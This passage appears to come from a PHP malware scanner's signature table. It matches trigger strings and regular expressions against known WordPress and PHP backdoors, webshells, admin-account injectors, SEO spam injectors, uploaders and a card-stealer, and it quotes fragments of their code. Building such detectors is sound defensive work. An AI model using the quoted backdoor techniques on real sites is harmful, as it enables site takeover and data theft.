			'echo \'<div class="_all_wplink' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.161', 'add_action\\(.wp_footer.[\\s]*,[\\s]*.make_footer.\\);[\\s]*function make_footer..\\{[\\s]*if .is_home[^\']+echo .<div class=._all_wplink[^}]+<.div>.;[\\s]*}[\\s]*}'),
		),
		
		'require_once(\'includes/CCTM_Communicator.php\')' => array(STR_TRIGGER,
	
			'$_objCCTMCom = new CCTM_Communicator();' => array(STR_TRIGGER,
				'$_objCCTMCom->addInfo(array($user_login' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.wordpresscore.002', 'function (\w+)\(\$user_login, .user\)\s*\{\s*require_once..includes.CCTM_Communicator.php.\);[^}]+\}\s*add_action..wp_login., .\1.,[^\)]+?\);'),
				'$_objCCTMCom = new CCTM_Communicator();' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.wordpresscore.002.02', '\$_objCCTMCom = new CCTM_Communicator..;\s*\$_objCCTMCom->send_info..;'),
			),
	
			'require_once(\'includes/CCTM_Communicator.php\');' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.wordpresscore.002.03', '\brequire_once..includes.CCTM_Communicator.php.\);'),
		),
	
		'_hide($plugins)' => array(STR_TRIGGER,
	
			'_SCRIPT_FILE_FULL' => array(STR_TRIGGER,
				'$user->data->user_login ===' => array(STR_CLEARFILE, 'php.spam-seo.fake_plugin.010', NULL),
			),
	
			'window.wp_cfg_\'.POPUPLINK_BASENAME.\'=\'.json_encode($' => array(STR_CLEARFILE, 'php.spam-seo.fake_plugin.014', NULL),
		),
	
		'backdoor' => array(STR_TRIGGER,
	
			'(!username_exists(' => array(STR_TRIGGER,
				'$user = new WP_User($' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.wp_adminadd.026', 'add_action\(.[\w]+.,[\s]*.[\w]+.\);[\s]*function[\s]*[\w]+\(\)[\s]*\{[\s]*(I|i)f[\s]*\(\$_GET\[.[\w]+.\][\s]*==[^;]+;[\s]*(I|i)f[\s]*\(!username_exists\(.[\w]+.\)\)[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*wp_create_user\([^\}]+\$user->set_role\(.[\w]+.\);[\s]*\}[\s]*\}[\s]*\}'),
			),
	
			'$user_id=wp_create_user' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.wp_adminadd.004', 'add_action\\(.wp_head.,.[\\w]+.\\);[\\s]*[\\w]+\\(\\)\\{[\\s]*.f\\(\\$_GET..backdoor..==.go.\\)\\{[\\s]*require[^}]+user->set_role..administrator.\\);[\\s]*}[\\s]*}[\\s]*}'),
		),
	
		'$seo_plugin=get_option("ranking");' => array(STR_CHAIN_TRIGGER,
			'(strstr($_SERVER[\'HTTP_USER_AGENT' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.250', '\$seo_plugin[\s]*=get_option\("ranking"\);[\s]*if[\s]*\(strstr\(\$_SERVER\[.HTTP_USER_AGENT.\],[\s]*.[\w]+.\)\)[\s]*\{[\s]*add_action[^;]+\);[\s]*\}'),
			'function ranking() {' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.250.02', 'function ranking\(\)[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*"[^}]+;[\s]*echo \$[\w]+;[\s]*\}'),
		),
	
		'add_action(\'init\', create_function(\'\', implode' => array(STR_TRIGGER,
			'create_function(\'\', implode("\n", unserialize(get_option(' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.dbload.003', 'add_action[^;]+implode\\(\"[^\"]+\",[\\s]*unserialize\\(get_option\\(\"[\\w]+\"\\)\\)\\)\\)\\);'),
			'implode("\n", array_map("base64_decode", unserialize' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.dbload.002', 'add_action\(.init., create_function.\'\', implode\(..n., array_map\(.base64_decode., unserialize.get_option..\w+.\){6};'),
		),
	
		'usleep(' => array(STR_TRIGGER,
			',document.body||document.documentElement)</script><script src=\'https:' => array(STR_TRIGGER,
				'setAttribute(\'data-zone\',' => array(STR_TRIGGER,
					');})(document.createElement(\'script\'),\'http' => array(STR_CLEAR_MULTIMATCH, 'php.malware.injector.082', 'function.\w+\(\).\{\s+echo."<script>.function[^E]*Element\(\'script\'\),\'http[^j]*js[^;]*;\s+\}\s+add_action\(\'\w+\',.\'\w+\'\);\s+add_filter[^\{]*\{\s+usleep.\d+.;\s+return.\$\w+;\s+\},.\d+,.\d+\);'),
				),
			),
		),
	
		'register_setting(' => array(STR_TRIGGER,
			'google.,/search' => array(STR_TRIGGER,
				'$plugin_key=' => array(STR_CLEARFILE, 'php.spam-seo.fake_plugin.019', NULL),
			),
		),

		'function add_js_scripts() {' => array(STR_TRIGGER,
			'add_action(\'admin_enqueue_scripts\', \'add_js_scripts\' );' => array(STR_CLEAR_MULTIMATCH, 'js.spam-seo.injector.051', 'function add_js_scripts\(\)[\s]*\{[\s]*wp_enqueue_script\([^;]+\'\',[\s]*null[\s]*,[\s]*true\);[^{]+add_action\([^;]+add_js_scripts[^;]+\);'),
		),
	
		'unset($wp_list_table->items[$key])' => array(STR_TRIGGER,
			'add_action(\'pre_current_active_plugins\', \'' => array(STR_CLEAR_MULTIMATCH, 'php.hacktool.wp_plugin_hider.001', '(add_action\(.pre_current_active_plugins[^;]+\);){0,1}[\s]*function [\w]+\(\)[\s]*\{[\s]*global \$wp_list_table;[^}]+unset\(\$wp_list_table->items\[\$[\w]+\]\);[\s\}]+(\1)*(function[\s]*[\w]+\([\s]*\$[\w]+[\s]*\)[\s]*\{[\s]*if\(current_user_can\(.administrator.\)[^;]+;[\s]*\}[\s]*return[\s]*\$[\w]+;[\s]*\}){0,1}'),
		),
	
		'base64_decode(' => array(STR_TRIGGER,
			'eyJsaWNlbnNlIjoiY3JlYXRlX2Z1bmN0aW9uIiwiYWNjb3VudCI6IiR4IiwidGhlbWUiOiJ' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.link_injector.012', 'function [\w]+\(\)[\s]*\{[\s]*(\/\/[^\n]+[\s]*)?\$[\w]+[\s]*=[\s]*<<<KEY[^\}]+\}[\s]*\}[\s]*add_action\([^\)]+\);'),
		),
		
		'Author URI:' => array(STR_TRIGGER,
			'Plugin URI: http://google.com' => array(STR_CLEARFILE, 'php.spam-seo.fake_plugin.018', NULL),
		),
	
		'add_action(\'wp_enqueue_scripts\', \'Func11\');' => array(STR_CLEAR_MULTIMATCH,'php.spam-seo.SoakSoak.002', 'function Func11\\(\\)[\\s]*\\{[\\s]*wp_enqueue_script..json2..;[\\s]*\\}[\\s]*add_action..wp_enqueue_scripts., .Func11..;'),
		'add_action(\'wp_enqueue_scripts\', \'FuncQueueObject\');' => array(STR_CLEAR_MULTIMATCH,'php.spam-seo.SoakSoak.001', 'function FuncQueueObject\\(\\)[\\s]*\\{[\\s]*wp_enqueue_script..swfobject..;[\\s]*\\}[\\s]*add_action..wp_enqueue_scripts., .FuncQueueObject..;'),
		'add_action(\'wp_loaded\',\'thfr_kete_register_codes\', 13);' => array(STR_CLEARFILE, 'php.spam-seo.injector.083',NULL),
		');echo "$data";}}add_action(\'wp_' => array(STR_CLEAR_MULTIMATCH,'php.backdoor.wp_addaction.001','<\?php[\s]*if[\s]*(\(!isset\(\$_COOKIE\[[^]]+\]\)\){[\s]*if[\s]*)?\(mt_rand\([\d]+,[\d]+\)[\s]*==[\s]*[\d]+\)[\s]*\{[\s]*function[\s]*[\w]+\(\)[\s]*\{if[^{]+curl_init[^}]+\}}add_action[^}]+;[\s]*\}+[\s]*\?>'),
		'wp_create_user(\'wordpress' => array(STR_CLEAR_MULTIMATCH,'php.backdoor.wp_addaction.001.02', 'add_action\(.wp_(head|footer).\s*,\s*\'([\w]+)\'\);\s*function[^>\/]+GET..\w+[^>]+\(!\s*username_exists\(\'wordpress\'\)\)[^>\/]+user->set_role\s*..administrator.\);\s*\}\s*\}\s*\}'),
		'add_option(\'blogoption\', $value, \'\', \'yes\');' => array(STR_CLEAR_MULTIMATCH,'php.backdoor.wp_worm.002.02', '\/\/beginXX\s*add_action..after_setup_theme[^\}]+?blogoption[^\?>]+\/\/endXX'),
		'if(!username_exists(\'wordpress' => array(STR_CLEAR_LINEMATCH,'php.backdoor.wp_addaction.001.03', 'add_action..wp_(?:head|footer).,\s*\'([\w]+)\'.;function \1[^>]+username_exists..wordpress.\)\)..add[^>]+wp_mail..addressdecode[^>]+;}}'),
		'add_action(\'init\', \'barry\');' => array(STR_CLEARFILE, 'php.hacktool.wpuserdisclose.001', NULL),
		'add_action(\'get_footer\', \'add_ssc' => array(STR_CLEAR_MULTIMATCH, 'php.injected.scounter.001', 'add_action\(\'get_footer\', \'add_sscounter[^\x02]+location.\.split[^;]+;[\s\}]+'),
		'pack("H*","3c73637269707420747970653d22746578742f6a617661736372697074223e76617220' => array(STR_CLEAR_MULTIMATCH, 'php.injected.wp_footer_script.002', '\/\* wordpress (\w+) \*\/\s*function \1\(\)[\s]*\{[^#]+?dirname\(__FILE__\)[^#]+add_action[\s]*\([\s]*[\w]+\(.[\w+=]{10,}.,[\s]*[\d]+[\s]*\)[\s]*,[\s]*"\1"[\s]*\);'), //mod by PG to cover more variants
		'Plugin Name: WPCore2' => array(STR_CLEARFILE, 'php.injected.WPCore2.001', NULL),
		'if (!file_put_contents(ABSPATH.\'wp-about-4.2.php\'' => array(STR_CLEARFILE, 'php.malware.fake_wp_about.001', NULL),
		'wp-content/mu-plugins/mu-plugin.png' => array(STR_CLEARFILE, 'php.malware.fake_social-share.001', NULL),
		'post_content NOT LIKE \'%torrent%' => array(STR_CLEARFILE, 'php.injected.WPCore2.002', NULL),
		'function fbprotered' => array(STR_CLEAR_MULTIMATCH, 'php.malware.wp_fbprotered.001', 'add_action..wp_head.,.fbprotered..;\s*function fbprotered\(\)[^\x02]+add_action..wp_footer.,.fbprotereded..;\s*function fbprotereded\(\)[^;\}]+;\s+\}'),
		'add_action( \'template_redirect\',\'pagegood\');' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.redirect.001', 'function\s*isbot[^>]+spiderSite\s*as[^>]+function\s*pagegood[^>]+_GET..tag[^;]+assets..\.\$_GET..tag[^>]+add_action..wp_footer[^>]+function\s*mlink[^>]+home_url[^;]+dir..t_num[^>]+a>[^>]+add_action.\s*.template_redirect.,.pagegood..;'),
		'icaiji_' => array(STR_CLEARFILE, 'php.malware.injector.033', NULL),
		'Plugin Name: WordPress Researcher' => array(STR_CLEARFILE, 'php.backdoor.fake_plugin.001', NULL),
		'research_plugin' => array(STR_CLEARFILE, 'php.backdoor.fake_plugin.001.02', NULL, 1),
		'Cyb3r_Sw0rd' => array(STR_CLEARFILE, 'php.hacktool.generic.007', NULL),
		'assets/js/jquory.js' => array(STR_CLEAR_MULTIMATCH, 'php.malware.cryptominer.006', 'function\s*enqueue_my_scripts\(\)\s*{\s*wp_enqueue_script\s*\(\s*.\S+,\s*[\'"]https?:[^,]+,\s*\w+,\s*\w+,\s*\w+\s*\)\s*;\s*wp_enqueue_script\(\s*.\S+,\s*plugins_url\(\)\s*\.\s*[\'"][(\w+\-\/)]+jquory\.js[\'"]\s*,[^\)]+\)\s*;\s*}\s*add_action\(\s*.admin_enqueue_scripts.,\s*.enqueue_my_scripts.\s*\)\s*;\s*add_action\(\s*.wp_enqueue_scripts.,\s*.enqueue_my_scripts.\s*\)\s*;'),
		'= @unserialize(file_get_contents(dirname( WPDBASECACHE_FILE )  . \'/options.ini\'))' => array(STR_CLEARFILE, 'php.spam-seo.fake_plugin.013', NULL),
		'\74\x64\x69\x76\x20\x73\164\x79\x6c\145\75\x22\x70\157\163\x69\164\151\x6f\156\x3a\x61\142\x73\157\x6c\x75\164\x65\73\164\x6f\x70\72' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.theme_link_spam.005', 'if\(\s*\!\s*function_exists\(.(\w+).\)\s*\)\s*{\s*function\s*\1\(\$\w+\)\s*{\s*if\s*\(is_user_logged_in\(\)\)\s*{\s*}\s*else\s*{\s*if\s*\(\s*is_page\s*\(\)\|\|\s*is_single\(\)\)\s*{\s*echo\s*[\'"].74.x64.x69.x76.x20.x73.164.x79.x6c.145.75.x22.x70.157.163.x69.164.151.x6f.156.x3a.x61.142.x73.157.x6c.x75.164.x65.73.164.x6f.x70.72[^;]+;\s*}\s*}\s*}\s*add_action\(\s*.wp_footer.,\s*.\1.\s*\)\s*;\s*}'),
	),

	'echo "' => array(STR_TRIGGER,

		'exit;' => array(STR_TRIGGER,

			'md5($_COOKIE' => array(STR_TRIGGER,
				'header("HTTP/1.1 404 Not Found");' => array(STR_TRIGGER,
					'header("Status: 404 Not Found");' => array(STR_TRIGGER,
						'test ok' => array(STR_CLEAR_MULTIMATCH, 'php.malware.component.012', 'error_reporting\(0\);[\s]*if[\s]*\(isset\(\$_GET\[.action.\]\)[\s]*&&[\s]*\$_GET\[.action.\]==.test.\)[\s]*\{[\s]*echo[\s]*.test ok.;[\s]*exit;[\s]*\}[\s]*if[\s]*\(!isset\(\$_COOKIE[^\)]+\)[\s]*\|\|[\s]*md5\(\$_COOKIE[^\}]+exit;[\s]*\}[\s]*else[\s]*setcookie[^\)]+\);'),
					),
				),
			),

			'($_POST["upload"] == "go")' => array(STR_TRIGGER,
				'chmod($_SERVER["DOCUMENT_ROOT"]."/wp-temp.php", 0644);' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.injector.113', 'function download[^\(]+\(\$url[^}]+}[\s]*if[\s]*\(\$_POST\[[^{]+{[\s]*download[^(]+\(\$_POST\[.target.\],[\s]*\$_SERVER\[.DOCUMENT_ROOT[^}]+}[\s]*add_action[^>]+echo[\s]*.\|\|\|\|%.[\s]*\.[\s]*str_replace\(\$_SERVER\[.DOCUMENT_ROOT[^;]+;[\s]*exit;[\s]*}[\s]*}'),
			),

			'preg_match(\'/wp-login.php|wp-admin|administrator/i' => array(STR_TRIGGER,
				'function havelinks()' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.094', NULL),
			),

			'function crossEcho($string)' => array(STR_TRIGGER,
				'static function write_config_file' => array(STR_CLEARFILE, 'php.hacktool.mailer.106', NULL),
			),

			'function Evil($x,$y=false)' => array(STR_TRIGGER,
				'function Execute($x)' => array(STR_CLEARFILE, 'php.backdoor.webshell.167', NULL),
				'if(any("x",$_REQUEST)&&$_REQUEST[\'x\']=="scan-port")' => array(STR_CLEARFILE, 'php.backdoor.webshell.199', NULL),
			),

			'define(\'root_dir' => array(STR_TRIGGER,
				'define(\'shellname' => array(STR_CLEARFILE, 'php.backdoor.webshell.180', NULL),
			),

			'[\'website\']' => array(STR_TRIGGER,
				'(move_uploaded_file($files[\'tmp_name\'], $fullpath))' => array(STR_CLEARFILE, 'php.backdoor.uploader.336', NULL),
			),

			'$query_str = "SELECT ID FROM $wpdb->users";' => array(STR_CLEARFILE, 'php.hacktool.wp_users.007', NULL),
			'<title>Загрузка файлов на сервер</title>' => array(STR_CLEARFILE, 'php.backdoor.uploader.272', NULL),
			'function actionFilesWin()' => array(STR_CLEARFILE, 'php.backdoor.filesman.108', NULL),
			'$disFuns=get_cfg_var("disable_functions");' => array(STR_CLEARFILE, 'php.hacktool.configuration_stealer.018', NULL),
			'base64_encode(time().\':;:\'.$_POST[\'log\'].\':;:' => array(STR_CLEARFILE, 'php.spam-seo.injector.325', NULL),
			'if($_GET[\'cmd\'] == "scamlist")' => array(STR_CLEARFILE, 'php.phishing.script.033', NULL),
			'if ($doing == \'downfile\' && $thefile) {' => array(STR_CLEARFILE, 'php.backdoor.filesman.141', NULL),
		),

		'do_action' => array(STR_TRIGGER,
			'position:absolute;visibility:collapse;' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.injector.271', 'echo\s*[\'"]\s*<a style=."position:absolute;visibility:collapse;." href=."https?:..\w[^">]+">[^<]+<.a>\s*[\'"]\s*;'),
			'<h1><span><nobr><a href="<?php echo admin_url(); ?>">Go to admin dashboard</a> - <a href="<?php echo $_SERVER[\'PHP_SELF\']' => array(STR_CLEARFILE, 'php.hacktool.wp_users.013', NULL),
		),

		'$ptitle = base64_encode(get_bloginfo(' => array(STR_TRIGGER,
			'$url = $protocol . $_SERVER' => array(STR_TRIGGER,
				'$linkcontent = @file_get_contents($' => array(STR_CLEARFILE, 'php.spam-seo.injector.257', NULL),
			),
		),

		'function unzip' => array(STR_TRIGGER,
			'function lsdir()' => array(STR_TRIGGER,
				'echo "Ok! $' => array(STR_CLEARFILE, 'php.backdoor.zip_uploader.003', NULL),
			),
		),

		'$all_plugins = get_plugins();' => array(STR_TRIGGER,
			'foreach ($all_plugins as $key => $value)' => array(STR_TRIGGER,
				'_mu_hide_plugin' => array(STR_CLEARFILE, 'php.backdoor.fake_plugin.012', NULL),
			),
		),

		'AddHandler cgi-script .izo' => array(STR_TRIGGER,
			'unlink("pyth/she.izo");' => array(STR_CLEARFILE, 'php.malware.dropper.031', NULL),
		),

		'echo "<!--$random_id-->";' => array(STR_TRIGGER,
			'($v_agent == "Mozilla/' => array(STR_CLEARFILE, 'php.phishing.script.012', NULL),
		),

		'<font color=green>OK</font><br>' => array(STR_TRIGGER,
			'if(mail($email[$i], \'\', $message, $headers' => array(STR_CLEARFILE, 'php.hacktool.mailer.128', NULL),
		),

		'<!-- DNN Platform' => array(STR_TRIGGER,
			'<title><?php echo $keyword ?></title><meta id' => array(STR_CLEARFILE, 'php.spam-seo.injector.317', NULL),
		),

		'\x61d\x6d\x69\x6e_\x6d\x65' => array(STR_TRIGGER,
			'echo plugins_url(' => array(STR_CLEARFILE, 'php.backdoor.fake_plugin.019', NULL),
		),

		'echo "<font color=red>Directory Not Deleted!</font><br>";' => array(STR_CLEARFILE, 'php.backdoor.webshell.146', NULL),
		'<title>unzip file by' => array(STR_CLEARFILE, 'php.hacktool.unzip.002', NULL),
		'Update DB (Savecc)\' => base64_decode(\'VVBEQVRFIGBjb3JlX2NvbmZpZ19kY' => array(STR_CLEARFILE, 'php.malware.magento-cc-stealer.091', NULL),
		': \'phpinfo();\';?>" style=' => array(STR_CLEARFILE, 'php.backdoor.webshell.176', NULL),
		'userfile_name;@move_uploaded_file($userfile_tmp,$abod);echo\'<' => array(STR_CLEARFILE, 'php.backdoor.magento-uploader.007', NULL),
		'$shell2 = explode("\n",$shell);' => array(STR_CLEARFILE, 'php.backdoor.shellfinder.005', NULL),
		'static $count = 1; echo  $count.". ".$path_to_file2;echo "<br>";' => array(STR_CLEARFILE, 'php.hacktool.search_replace.001', NULL),
		'echo "<p><b>List of auto detected .zip archives!</b></p>";' => array(STR_CLEARFILE, 'php.hacktool.unzip.003', NULL),
		'deleteAll(\'botadmin.php\');' => array(STR_CLEARFILE, 'php.hacktool.phishbackend.015', NULL),
		'loveLogin() {' => array(STR_CLEARFILE, 'php.backdoor.uploader.013', NULL),
	),

	'default_action' => array(STR_TRIGGER,

		'$auth_pass' => array(STR_TRIGGER,

			'auth_pass[^\}]+exit;' => array(REX_TRIGGER,
				'default_charset=[^;]+;[\s]*exit;[\s]*\}' => array(REX_CLEAR_LINEMATCH, 'php.backdoor.filesman.101.02', '(if\(isset\(\$_GET\[[^\]]+\]\)\)[\s]*)?\{[\s]*\$auth_pass[^\}]+exit;[\s]*\}'),
			),

			'eval("\x65\x76\x61\x6C' => array(STR_CLEARFILE, 'php.backdoor.filesman.033', NULL),
			'GR5yYXp3YH17ejRne3h9cGdgdWBxPDB5dX9xYWQ9NG8Z' => array(STR_CLEARFILE, 'php.backdoor.filesman.056', NULL),
			'\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28' => array(STR_CLEARFILE, 'php.backdoor.filesman.064', NULL), 
			'#df5' => array(STR_CLEARFILE, 'php.backdoor.filesman.101', NULL),
		),

		'{header(\'HTTP/1.0 404 Not Found\');exit;}' => array(STR_TRIGGER,
			'$default_action = \'F' => array(STR_CLEARFILE, 'php.backdoor.filesman.039', NULL),
		),

		'\$default_action[\s]*=[\s]*[\'"\s\.]*F' => array(REX_CLEARFILE, 'rex.backdoor.filesman.002', NULL),
		'$default_action = \'GoogleMan\';' => array(STR_CLEARFILE,'php.backdoor.googleman.001', NULL),
		'$default_action = base64_decode(\'RmlsZXNNYW4=\');' => array(STR_CLEARFILE,'php.backdoor.filesman.002.010', NULL),
		'extract(array("default_action" => \'FilesMan\'' => array(STR_CLEARFILE, 'php.backdoor.filesman.023', NULL),
	),

	'if(!file_exists($f)||filesize($f)<1000){' => array(STR_TRIGGER,

		'file_put_contents($' => array(STR_TRIGGER,

			'add_action( \'init\', function()' => array(STR_TRIGGER,
				'base64_decode("PD9wa' => array(STR_CLEARFILE, 'php.backdoor.fake_plugin.014', NULL),
			),

			'define(\'ABSPATH\', rtrim($_SERVER[\'DOCUMENT_ROOT' => array(STR_CLEARFILE, 'php.backdoor.fake_plugin.010', NULL),
		),

		'file_put_contents($f,file_get_contents(\'http:' => array(STR_TRIGGER,
			'.txt\'));' => array(STR_CLEARFILE, 'php.backdoor.fake_plugin.005', NULL),
		),
	),

	'if (preg_match($keywordsRegex' => array(STR_TRIGGER,
		'wp_set_current_user($' => array(STR_TRIGGER,
			'administrator' => array(STR_CLEARFILE, 'php.backdoor.wp-admin_bypass.005', NULL),
		),
	),

	'error_reporting(6135);' => array(STR_TRIGGER,
		'query("SELECT".' => array(STR_TRIGGER,
			'adminer()' => array(STR_CLEARFILE, 'php.hacktool.adminer.001', NULL),
		),
	),

	'value="&amp;"' => array(STR_TRIGGER,
		'<input type="text" name="g__g_" value=""/>' => array(STR_CLEAR_LINEMATCH,'php.backdoor.encrypted.001.02', '<form action="" method="post"><input type="text" name="g__g_" value="".><input type="submit" value="&amp;".><.form>'),
	),

	'function my_back()' => array(STR_TRIGGER,
		'$_GET[\'back' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.wp_adminadd.013', 'add_action\([\s]*[^,]+,[\s]*.my_back[^;]+\);[\s]*function my_back\(\)[\s]*\{[\s]*if[\s]*\([\s]*\$_GET\[.back.\][\s]*==[^{]+\{[\s]*require[^}]+set_role\([\s]*.administrator[^;]+;[\s}]+'),
	),

	'$agent = $_SERVER[\'HTTP_USER_AGENT\'];' => array(STR_TRIGGER,
		'(strpos($sec,"google")): $part' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.279', 'function [\w]+\(\)[\s]*\{[\s]*\$agent[\s]*=[\s]*\$_SERVER\[.HTTP_USER_AGENT.\];[\s]*\$[\w]+[\s]*=[\s]*\$agent;[\s]*switch\(true\)[\s]*\{[\s]*case[\s]*\(strpos\(\$sec[^\}]+\}[\s]*if[\s]*[\s]*\(\$[\w]+[\s]*==[\s]*1\)[\s]*\{[^\}]+\}[\s]*\}[\s]*add_action\([^;]+\);'),
	),

	'function writAble($dir, $perm)' => array(STR_TRIGGER,
		'function makeRequest($url, $post = null, $head = null)' => array(STR_CLEARFILE, 'php.backdoor.webshell.172', NULL),
	),

	'function actionInfect() {' => array(STR_CLEARFILE, 'php.backdoor.webshell_gen.063', NULL),
	'?action=goto&scr=#deletedir#" style="color: rgb(255, 0, 0);"><u> <- DeleteDir' => array(STR_CLEARFILE, 'asp.backdoor.aspshell.007', NULL),
	'$action = \'?action=FucK\';' => array(STR_CLEARFILE, 'php.backdoor.secwar-shell.001', NULL),
	'<textarea name="letter" placeholder="Here The Letter" rows' => array(STR_CLEARFILE, 'php.hacktool.mailer.033', NULL),
	'<h1>YOUR MAILBOX QUOTA HAVE BEEN SCHEDUELED FOR ADDITIONAL' => array(STR_CLEARFILE, 'html.phishing.generic.003', NULL),
	'>Uploader by Rabbit' => array(STR_CLEARFILE, 'php.backdoor.uploader.080', NULL),
	'// Mr.CrazyweB' => array(STR_CLEARFILE, 'php.backdoor.uploader.083', NULL),
	'html_title = shell_fake_name' => array(STR_CLEARFILE, 'asp.backdoor.webshell.001', NULL),
	'rename($_POST["old_name"], $_POST["folder_name"]);' => array(STR_CLEARFILE, 'php.backdoor.filesman.124', NULL),
),

'md5(' => array(STR_TRIGGER,

	'md5($_POST[' => array(STR_TRIGGER,

		'security_code\'];if(!$sec)$sec=".";$sec=rtrim' => array(STR_CHAIN_TRIGGER,
			'*/if(!empty($_SERVER[\'HTTP_USER_AGENT' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.uploader.169.03', '\*\/if\(!empty\(\$_SERVER\[.HTTP_USER_AGENT.\]\)\) \{\/\*'),
			'*/$uAs=array(' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.uploader.169.04', '\*\/\$uAs=array\([^;]+\);\/\*'),
			'])){header(\'HTTP/1.0 404 Not Found\');exit;}}/*' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.uploader.169.05', '\*\/if\(preg_match\(....implode.....\$uAs[^}]+exit;\}\}\/\*'),
			'$a=\'as\';' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.uploader.169.06', '\$a=.as.;'),
			'*/if(!empty($_FILES[\'message\'][\'name\']) AND (md5($_POST' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.uploader.169.07', '\*\/if\(!empty\(\$_FILES\[.message.\]\[.name.\]\) AND \(md5\(\$_POST\[[^{]+\)\)[\s]*\{\/\*'),
			'".";$sec=rtrim($sec,"/");/*' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.uploader.169.08', '\*\/\$sec = \$_POST\[.security_code.\];[^;]+;\$sec=rtrim[^;]+\);\/\*'),
			'*/$t=$_FILES[\'message\'][\'tmp_name\'];$name=$_FILES' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.uploader.169.09', '\*\/\$t=\$_FILES\[.message[^*]+name.\];\/\*'),
			'*/@move_uploaded_file($t, $sec' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.uploader.169.10', '\*\/@move_uploaded_file.\$t, \$sec[^}]+;}\/\*'),
			'print \'<html><head><title>' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.uploader.169.11', '\*\/print .<html><head><title>[^;]+.html>.;\/\*'),
		),

		'isset($_POST[' => array(STR_TRIGGER,

			'(isset($_POST[\'username\']) && md5($_POST[\'username\'])' => array(STR_TRIGGER,
				'$_POST[\'where\'].$_POST[\'name\'], \'w\');' => array(STR_TRIGGER,
					'$url = $_POST[\'from\'];' => array(STR_TRIGGER,
						'.\'init\';' => array(STR_CLEARFILE, 'php.backdoor.uploader.274', NULL),
					),
				),
			),

			'= create_function("", $' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.create_function.019', 'if\s*\(\s*isset\s*\(\s*\$_POST\[[\'"](\w+)[\'"]\]\s*\)\s*\&{0,4}\s*md5\s*\(\s*\$_POST\[[\'"]\1[\'"]\]\s*\)\s*={0,4}\s*[\'"]\w+[\'"]\s*\)\s*\{\s*if\s*\([^{]+{\s*(\$\w+)\s*=\s*stripslashes\(\s*\$_POST\[[^}]+}\s*else\s*{\s*\2\s*=\s*\$_POST\[[^\$]+(\$\w+)\s*=\s*create_function\s*\([\'"]{2}\s*,\s*\2\s*\)\s*;\s*\3\(\)\s*;\s*exit\(\d+\)\s*;\s*}\s*;'),
			'aHR0cDovL3d3dy5yZWZ1ZC5tZ' => array(STR_CLEARFILE, 'php.hacktool.botnet_CC.001', NULL),
			'&& md5(md5(md5(' =>array(STR_CLEAR_LINEMATCH, 'php.backdoor.generic.094', 'if\(!isset\(\$_POST\[\'\w+\'\]\).&&.isset\(\$_POST\[\'\w+\'\]\).&&.preg_match\(\'\~....0\~\',.\$_POST\[\'\w+\'\]\)\).\$_POST\[\'\w+\'\][^5]*5\(md5\(md5\(\$_POST\[\'\w+[^;]*;'),
		),

		'move_uploaded_file($' => array(STR_TRIGGER,
			'multipart/form-data' => array(STR_TRIGGER,
				'(sha1(md5($_POST[' => array(STR_CLEARFILE, 'php.backdoor.uploader_POST.048', NULL),
				'!isset($_COOKIE[md5($_SERVER[' => array(STR_CLEARFILE, 'php.backdoor.uploader_POST.049', NULL),
			),
		),

		'@ini_set(\'output_buffering\', 0);' => array(STR_TRIGGER,
			'if($_POST[\'_login\'] == "LOGIN" and md5($_POST["user"])' => array(STR_TRIGGER,
				'echo \'<input type="text" name="user" size="50"><input type="submit" name="_login" id="_login" value="LOGIN"></form>\';' => array(STR_CLEARFILE, 'php.backdoor.uploader.337', NULL),
			),
		),

		'base64_decode($_POST["php"]' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.eval_POST.002.08', 'if.@md5.._POST[^;]+eval\s*.base64_decode.\$_POST..php[^>]+exit;[^\}]+\}'),
		'setcookie(md5($_SERVER[\'HTTP_HOST\']), $' => array(STR_CLEARFILE, 'php.backdoor.uploader.084', NULL),
		'if ($text($_FILES[' => array(STR_CLEARFILE, 'php.backdoor.generic.058', NULL),
		'function reload(){header("Location: ".basename(__FILE__))' => array(STR_CLEARFILE, 'php.backdoor.webshell.098', NULL),
		'md5($_POST[\'joomla_pass\']' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.219', 'if\s*\(\s*md5\(\$_SERVER\[["\']\w+["\']\]\s*\)\s*==\s*["\']\w+["\']\s*\)\s*\{\s*if\s*\(\s*md5\(\$_POST\[\'joomla_pass\'\]\s*\)\s*==\s*["\']\w+["\']\s*\)\s*\{\s*if\s*\(\s*is_uploaded_file[^=]+?=\s*file_get_contents[^;]+?;\s*if\s*\(\s*is_writable[^;]+?;\s*\}\s*else\s*if\s*\(\s*is_writable(?:[^=]+?=\s*__DIR__){2,4}[^;]+?;\s*\}\s*file_put_contents[^;]+?;\s*echo[^;]+?;\s*\}\s*\}\s*exit[^;]+?;\s*\}'),
